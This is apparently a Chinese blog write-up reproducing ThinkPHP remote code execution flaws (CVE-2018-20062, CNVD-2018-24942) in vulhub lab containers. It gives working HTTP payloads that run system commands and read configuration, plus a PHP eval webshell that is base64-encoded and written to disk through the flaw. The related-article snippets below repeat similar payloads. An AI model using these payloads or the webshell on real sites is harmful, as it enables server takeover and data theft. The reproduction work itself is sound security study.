Thinkphp漏洞复现

最新推荐文章于 2024-05-06 12:48:46 发布
最新推荐文章于 2024-05-06 12:48:46 发布
阅读量1.3k 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51151498/article/details/128321554
版权

Thinkphp简介

Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服 务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很 多基于 thinkphp 开发的网站。

Thinkphp历史漏洞

版本漏洞类型
ThinkPHP3.2.3缓存函数设计缺陷可导致Getshell
ThinkPHP3.2.3最新版update注入漏洞
ThinkPHP3.2.Xfind_select_delete注入
ThinkPHP3.Xorder_by注入漏洞
ThinkPHP5.0.Xsql注入漏洞
ThinkPHP5.0.10缓存函数设计缺陷可导致Getshell
ThinkPHP5SQL注入漏洞&&敏感信息泄露
ThinkPHP5.Xorder_by注入漏洞
ThinkPHP5.X远程代码执行

漏洞复现

Thinkphp5.0.23远程代码执行漏洞(CVE-2018-20062)
漏洞简介

Thinkphp5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞

影响版本:
Thinkphp 5.0.0~ 5.0.23

搭建靶场环境
使用vulhub靶场搭建

cd vulhub/thinkphp/5.0.23-rce

docker-compose up -d

访问your-ip:8080/?s=captcha

POST提交:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

代码执行成功

 写入webshell

进入容器:docker exec -it 32736eb79481  /bin/bash  

webshell:<?php @eval ($_POST['cmd']);?>

base64编码后:PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=

写入容器:

echo -n PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= | base64 -d > a.php  

 访问:http://your-ip:8080/?s=captcha

POST提交:

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= | base64 -d >cmd.php

蚁剑链接:

执行命令:

ThinkPHP 5.0.x 未开启强制路由导致的RCE 漏洞分析(CNVD-2018-24942)

原理:框架对传入的路由参数过滤不严格,导致攻击者可以操作非预期的控制器类来远程执行代码。

影响版本:ThinkPHP 5.0.5-5.0.22 || 5.1.0-5.1.30

搭建靶场环境
使用vulhub靶场搭建

cd vulhub/thinkphp/5-rce

docker-compose up -d

payload1:

index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=-1

payload2:

?s=index/think\config/get&name=database.username # 获取配置信息
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id #命令执行

参考链接:

https://www.cnblogs.com/HelloCTF/p/15748360.html

https://blog.csdn.net/qq_61503377/article/details/125989830?spm=1001.2014.3001.5501

- Time
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现ThinkPHP 2.x/5.0.x/5.1.x/5 in-sqlinjection 命令执行漏洞
weixin_45556536的博客
11-24 1265
Thinkphp—2-rce一级目录二级目录三级目录涉及版本漏洞复现2-rce 一级目录 二级目录 三级目录 涉及版本 5.0.8-5.0.13 不需要开启debug // payload POST /tp5010/public/index.php?s=index/index/index HTTP/1.1 Host: 127.0.0.1:8000 Content-Length: 52 Content-Type: application/x-www-form-urlencoded s=whoami&a
渗透测试之路:ThinkPHP漏洞复现
m0_68353775的博客
01-10 2311
其实ThinkPH框架漏洞大多用到的都是设置对于控制器名的一个疏忽问题,不理解的小伙伴可以查来url调用文件的机制来学习一下,其实这些框架漏洞都是基于基础漏洞的一些拓展,至于sql漏洞,了解一下pdo预编译原理即可。不管java或是php在进行数据库查询的时候都应该进行pdo预编译,我们都知道,在jdbc工作的时候分成好多步1.建立连接2.写入sql语句3.预编译sql语句4.设置参数5.执行sql获取结果6.遍历结果(处理结果)7.关闭连接。
PHP 开发 框架安全ThinkPHP 序列 漏洞测试.
最新发布
网络安全领域___专研者.
05-06 1095
ThinkPHP 是一个流行的国内PHP 框架,它提供了一套完整的安全措施来帮助开发者构建安全可靠的 web 应用程序。ThinkPHP 本身不断更新和改进,以应对新的安全威胁和漏洞
过去一年网络安全的首要威胁是什么?来看看这个报告
jklbnm12的博客
07-13 293
2021年2月,IBM安全团队 X-Force发布了《2021威胁情报指数》,报告显示,漏洞利用成为2020年的首要威胁。 对攻击者来说,寻找和利用网络中未打补丁的问题或常见的漏洞和暴露(CVE)是成功率最高的方法,这也是最常见的获得网络初始访问权的途径。 事实上,漏洞利用的成功率已经超过了钓鱼邮件,在很大程度上取代了凭证窃取,成为攻击者渗透网络的最可靠方法。 现状:新漏洞虽多,但旧漏洞威胁更大 X-Force数据显示,Citrix服务器的目录遍历漏洞(CVE-2019-19871)是2020年被利用最多
thinkphp漏洞复现
zzf011900的博客
04-02 1286
thinkphp 远程命令执行漏洞php的一个开发框架,5.0.23及以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用request类任意方法,构造payload,导致远程命令执行。浏览器访问:http://192.168.59.10:8080/index.php?Rce 恶意构迷的语句在服务器(系统)上执行,从而达到黑客控制服务器的目的。浏览器访问:http://192.168.59.10:8080/函数:一串按照顺序和一定逻辑执行的代码。MSF实现直接获取权限原理。
Thinkphp5.0.23-rce漏洞复现
qq_64875725的博客
06-02 2415
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
【01】ThinkPHP 5.0.1 完整版项目部署
Chandlerr的博客
03-23 501
ThinkPHP 5.0.1 完整版项目部署,工具使用的是PhpStudy
thinkphp5.0漏洞修复
心学的博客
09-07 1420
thinkphp5.0漏洞修复
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
thinkphp5.0.23命令执行-靶场复现
m0_66376444的博客
04-19 985
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。在大于5.0.21小于等于5.0.23的情况下,由于修改了method函数的逻辑,无法随意用变量,这里统一用只能用get[],route[]。命令执行成功,可以看出是windows,所以我用nc来拿shell。本次测试版本:thinkphp5.0.23。三、thinkphp总述。
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞+webshell工具连接(复现详细过程)
m0_52701599的博客
03-19 2809
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
漏洞复现-thinkphp-命令执行】vulfocus/thinkphp-3.2.x
10-14 2144
thinkphp-命令执行】日志包含
thinkphp系列漏洞复现(组合拳-vulhub里的)
m0_58596609的博客
01-07 1483
thinkphp系列漏洞复现(组合拳)
攻防世界高手进阶区通关教程(1)
锋刃科技的博客
05-15 1927
来到高手进阶区 baby_web 当我们访问index.php的时候会跳转到1.php,我们检查元素,打开网络,我们在输入index.php即可看到消息头有flag Training-WWW-Robots 打开robots.txt看到flag地址,打开即可 php_rce 这是thinkphp rce漏洞 index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0
ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现
yzl_007的博客
08-04 1098
ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现 影响范围 ThinkPHP 5.0.全版本 5.0.13~5.0.19的,这些版本默认情况下config中的app_debug配置项为false,需开启才能存在此漏洞漏洞复现 远程代码执行 直接get请求即可 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd pw
Thinkphp5.1.4漏洞复现
05-11
以下是漏洞复现的步骤: 1. 下载 ThinkPHP 5.1.4,创建一个名为 `demo` 的项目。 2. 在 `demo/application/index/controller` 目录下创建一个名为 `Index.php` 的控制器,添加以下代码: ```php namespace ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值